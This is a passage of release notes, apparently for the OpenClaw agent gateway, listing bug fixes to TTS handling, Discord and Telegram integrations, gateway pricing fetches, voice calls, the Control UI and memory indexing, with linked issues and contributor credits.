<p>TTS: honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, so tagged voice replies are synthesized instead of being dropped as empty voice-only payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</p>
</li>
<li>
<p>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</p>
</li>
<li>
<p>Discord: allow explicitly configured ack reactions in tool-only guild channels while keeping automatic lifecycle/status reactions suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>.</p>
</li>
<li>
<p>Discord: enable session-backed A2A announce target lookup so <code>sessions_send</code> uses the target session's <code>deliveryContext.accountId</code> or <code>lastAccountId</code> instead of falling back to the default bot in multi-account setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Discord/setup: write resolved guild/channel allowlist selections to the selected guild and channel instead of falling back to the wildcard guild during setup. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>.</p>
</li>
<li>
<p>Discord: treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, so health-monitor restarts no longer reject the monitor lifecycle. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>.</p>
</li>
<li>
<p>Discord/native commands: return an explicit warning when slash command dispatch or direct plugin execution produces no visible reply instead of a success-style completion ack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</p>
</li>
<li>
<p>Discord: keep typing indicators alive during long tool runs and auto-compaction while keepalive ticks continue, so active sessions do not appear stalled before the final reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</p>
</li>
<li>
<p>Discord: preserve multipart Content-Type headers for attachment uploads across REST fetch paths, so generated images and other media no longer fail delivery with <code>CONTENT_TYPE_INVALID</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>.</p>
</li>
<li>
<p>Discord: preserve attachment and sticker filenames when saving inbound media, so agents can see human-readable file names instead of only UUID-based paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>.</p>
</li>
<li>
<p>Discord: preserve non-ASCII channel names in session display labels while keeping allowlist matching on the existing ASCII slug contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</p>
</li>
<li>
<p>Discord/PluralKit: canonicalize proxied webhook turns to the original Discord message id for inbound dedupe, while preserving the proxy message id for reply routing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord: only inject thread starter context on the first turn of the effective thread session, so follow-up thread replies do not repeat the starter block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</p>
</li>
<li>
<p>Discord: resolve thread <code>ownerId</code> and <code>parentId</code> from Discord API-style snake_case payload fields, so bot-owned autoThreads do not require unnecessary mentions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</p>
</li>
<li>
<p>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</p>
</li>
<li>
<p>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</p>
</li>
<li>
<p>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: report missing dial-in details during setup and explain that Twilio cannot join Meet URLs without a phone dial plan.</p>
</li>
<li>
<p>Google Meet/Twilio: start the phone leg before sending Meet PIN DTMF, delay intro speech until after the post-connect dial sequence, and log each stage so operators can tell Twilio-leg audio from Meet-room audio.</p>
</li>
<li>
<p>Voice Call: accept provider call IDs for gateway speak/continue requests and report ended-call state from history instead of returning a generic "Call not found" for stale calls.</p>
</li>
<li>
<p>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</p>
</li>
<li>
<p>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</p>
</li>
<li>
<p>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</p>
</li>
<li>
<p>Telegram/DMs: keep incidental <code>message_thread_id</code> reply-with-quote metadata on the flat DM session by default while preserving opt-in DM topic isolation for configured topics, <code>dm.threadReplies</code>, and <code>direct.&lt;chatId&gt;.threadReplies</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>.</p>
</li>
<li>
<p>Telegram/network: raise outbound text and typing Bot API request guards to 60 seconds, keep low grammY client timeouts from preempting those guards, let higher <code>timeoutSeconds</code> configs extend safe method guards, and retry timed-out typing indicators through the transport fallback without risking duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>.</p>
</li>
<li>
<p>Telegram/native commands: register and clear command menus in both default and group-chat scopes, so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</p>
</li>
<li>
<p>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</p>
</li>
<li>
<p>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</p>
</li>
<li>
<p>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</p>
</li>
<li>
<p>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</p>
</li>
<li>
<p>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</p>
</li>
<li>
<p>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</p>
</li>
<li>
<p>Telegram/startup: use the existing <code>getMe</code> request guard for the gateway bot probe instead of a fixed 2.5-second budget, and honor higher <code>timeoutSeconds</code> configs for slow Telegram API paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a>.</p>
</li>
<li>
<p>Telegram/models: make model picker confirmations say selections are session-scoped and do not change the agent's persistent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</p>
</li>
<li>
<p>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</p>
</li>
<li>
<p>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</p>
</li>
<li>
<p>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</p>
</li>
<li>
